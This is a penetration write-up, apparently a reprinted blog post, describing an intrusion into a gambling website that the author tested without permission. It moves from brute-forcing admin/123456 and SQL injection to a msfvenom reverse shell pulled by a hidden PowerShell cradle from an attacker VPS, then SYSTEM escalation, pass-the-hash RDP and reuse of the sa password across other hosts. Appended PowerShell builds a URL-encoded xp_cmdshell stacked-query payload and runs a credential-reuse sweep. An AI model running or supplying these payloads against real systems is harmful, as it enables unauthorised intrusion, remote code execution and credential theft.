
Title: Penetration notes on a gambling (菠菜) site


0x00 Introduction

I was bored, found a gambling (菠菜) site online, did a simple test and took notes. Go easy on me, experts; please point out anything I got wrong.

0x01 Weak password

The site opens on a login page. There is no CAPTCHA, so I went straight to Burp Suite (bp) and brute-forced it. The weak password admin/123456 worked and took me straight into the admin backend.

[image]

0x02 Injection and getting a shell

I went through a lot of functional points. At one of them I found an upload interface and tried uploading a file, but it would not go through: the upload is whitelisted, so I gave up on it and kept looking. Adding a single quote to the gid parameter on http://url/GroupMember.aspx?gid= produced an error right away. Isn't that SQL injection?

[image]

Straight to sqlmap.

[image]

It turned out to be MSSQL with DBA privileges, so straight to --os-shell.

[image]

Getting a session in MSF

We already have a low-privileged shell; the next step is to bring it into msf and escalate. Generate a PowerShell script with msfvenom and drop it in the web directory on the VPS.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection -o xx.ps1

[image]

Start the handler (multi/handler) on the VPS.

[image]

Use PowerShell to pull the script and get a session:

powershell.exe -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString('http://x.x.x.x/xx.ps1'))"

[image]

If you try to run that PowerShell through stacked queries in the URL you hit a problem: the single quotes in the cradle close the T-SQL string. The fix is to encode the PowerShell so the command no longer contains single quotes. This site is handy for that:

https://r0yanx.com/tools/java_exec_encode/
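The following is an added example, not code from the original post, showing what the stacked-query route actually has to produce: a gid payload that enables xp_cmdshell (what sqlmap's --os-shell does on MSSQL under the hood, which needs the sysadmin role the post already has) and runs the download cradle as an -EncodedCommand so no single quote is left to break the T-SQL literal. The host, path and cradle URL are the post's placeholders; the function names are mine. It also handles a second pitfall the post does not mention: base64 contains '+', which a query string decodes as a space, so the whole payload is percent-encoded before it goes in the URL.

```powershell
# Added example: build a URL-safe stacked-query payload for the vulnerable
# gid parameter that enables xp_cmdshell and runs an encoded PowerShell cradle.
# Assumptions: http://url/GroupMember.aspx and http://x.x.x.x/xx.ps1 are the
# placeholders from the post; sp_configure needs sysadmin (the post has DBA).

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # powershell.exe -enc expects base64 over UTF-16LE, not UTF-8
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function New-StackedXpCmdshellPayload {
    param(
        [Parameter(Mandatory)][string]$OsCommand,
        [int]$Gid = 1
    )
    # xp_cmdshell takes a T-SQL string literal: any single quote inside the
    # OS command must be doubled or the literal closes early (the post's bug).
    $escaped = $OsCommand -replace "'", "''"
    $sql = @(
        "$Gid",
        "EXEC sp_configure 'show advanced options',1",
        "RECONFIGURE",
        "EXEC sp_configure 'xp_cmdshell',1",
        "RECONFIGURE",
        "EXEC master..xp_cmdshell '$escaped'"
    ) -join ';'
    return "$sql;--"
}

function New-InjectionUrl {
    param(
        [Parameter(Mandatory)][string]$BaseUrl,   # e.g. http://url/GroupMember.aspx
        [Parameter(Mandatory)][string]$Payload
    )
    # Percent-encode everything: '+' and '/' in the base64 and the ';' and
    # spaces in the T-SQL would otherwise be mangled by query-string decoding.
    $encoded = [Uri]::EscapeDataString($Payload)
    return ('{0}?gid={1}' -f $BaseUrl, $encoded)
}

# --- usage with the post's placeholder VPS address and script name ---
$cradle  = "IEX ((New-Object Net.WebClient).DownloadString('http://x.x.x.x/xx.ps1'))"
$b64     = ConvertTo-EncodedCommand -Command $cradle
$osCmd   = "powershell.exe -nop -w hidden -enc $b64"   # no quotes left in here
$payload = New-StackedXpCmdshellPayload -OsCommand $osCmd
$url     = New-InjectionUrl -BaseUrl 'http://url/GroupMember.aspx' -Payload $payload

$url
# Sanity check: decoding the base64 must give back the original cradle
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64)) -eq $cradle
```

The payload still contains single quotes of its own (around 'xp_cmdshell' and the OS command), which is fine: those are T-SQL string delimiters in the injected statement, not quotes nested inside another literal. The only quotes that have to disappear are the ones inside what xp_cmdshell executes, and the encoded form removes them.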

Privilege escalation

The session is up; the next goal is SYSTEM. Luckily getsystem worked directly here. If you do need to escalate, I recommend the Potato family; the success rate in real engagements is very high and many server versions are affected.

[image]

Migrate to another process so the session doesn't die.

[image]

Remote login to the server

I found that the server had port 3389 open. Since I had SYSTEM and it was a 2012 box, and versions newer than 2008 don't give up the plaintext password, I simply changed the administrator password. (Changing the administrator password directly is not recommended in real engagements.)

[image]

[image]

Log in to the administrator account remotely with the hash

Because it is Win2012 and the plaintext password can't be obtained, changing the administrator password outright is a bit inappropriate. Instead, try to RDP to the machine with the administrator's NTLM hash. (This is not the same machine; it's just to show the idea.)

[image]

Logging in to RDP with a hash requires 'Restricted Admin Mode' to be enabled:

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f   // enable Restricted Admin mode
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"   // check: a value of 0x0 means it is enabled

[image]

Successfully reached the administrator's remote desktop using the hash.

[image]

[image]

0x03 Others

Earlier on I had noticed port 1433 was open, so I looked for the database configuration file and logged in to the database with the credentials in it.

[image]

Looking on Fofa, I found quite a lot of related assets, many with port 1433 open. I guessed the sites were deployed by the same person, so I tried the password I had obtained against 1433 on those assets and hit several databases, all with sa privileges. Done.

[image]
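Added example, not from the original post: the credential-reuse sweep the last paragraph describes, done with the built-in System.Data.SqlClient so it needs no extra modules. It tries one recovered password against each in-scope host on 1433 and reports, per host, whether the login worked, whether it holds sysadmin (the DBA check that decides whether --os-shell / xp_cmdshell is even possible), the server version, and whether xp_cmdshell is already switched on. The host list, password and function name are constructed placeholders.

```powershell
# Added example: test one recovered sa password against several MSSQL hosts.
# Assumptions: hosts and password below are placeholders; targets are in scope.

function Test-MssqlPasswordReuse {
    param(
        [Parameter(Mandatory)][string[]]$Hosts,
        [string]$User = 'sa',
        [Parameter(Mandatory)][string]$Password,
        [int]$TimeoutSec = 5
    )
    foreach ($h in $Hosts) {
        $cs = "Server=$h,1433;User Id=$User;Password=$Password;Connect Timeout=$TimeoutSec;Encrypt=False"
        $conn = New-Object System.Data.SqlClient.SqlConnection $cs
        try {
            $conn.Open()
            $cmd = $conn.CreateCommand()
            # sysadmin membership, build number, and the current xp_cmdshell setting
            $cmd.CommandText = @"
SELECT IS_SRVROLEMEMBER('sysadmin') AS IsSysadmin,
       SERVERPROPERTY('ProductVersion') AS Version,
       (SELECT CAST(value_in_use AS int) FROM sys.configurations WHERE name = 'xp_cmdshell') AS XpCmdshellOn
"@
            $r = $cmd.ExecuteReader()
            [void]$r.Read()
            [pscustomobject]@{
                Host         = $h
                Login        = 'OK'
                IsSysadmin   = ($r['IsSysadmin'] -eq 1)
                Version      = [string]$r['Version']
                XpCmdshellOn = ($r['XpCmdshellOn'] -eq 1)
            }
            $r.Close()
        } catch {
            # login failure, timeout or refused port all land here
            [pscustomobject]@{
                Host         = $h
                Login        = "FAIL: $($_.Exception.Message)"
                IsSysadmin   = $null
                Version      = $null
                XpCmdshellOn = $null
            }
        } finally {
            $conn.Dispose()
        }
    }
}

# constructed host list (placeholders) and the password recovered from the config file
$targets = @('10.0.0.11', '10.0.0.12', '10.0.0.13')
Test-MssqlPasswordReuse -Hosts $targets -Password 'REDACTED_FROM_CONFIG' | Format-Table -AutoSize
```

A short connect timeout matters here: hosts that filter 1433 otherwise stall the loop for the default 15 seconds each. The xp_cmdshell column is useful on the defensive side too: a server where it is already enabled and the sa password is shared across a fleet is exactly the condition the post exploited.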

Reprinted from the original links:
https://mp.weixin.qq.com/s/kj55hbZMC9jF6xmbzXWu4w
https://xz.aliyun.com/t/12501
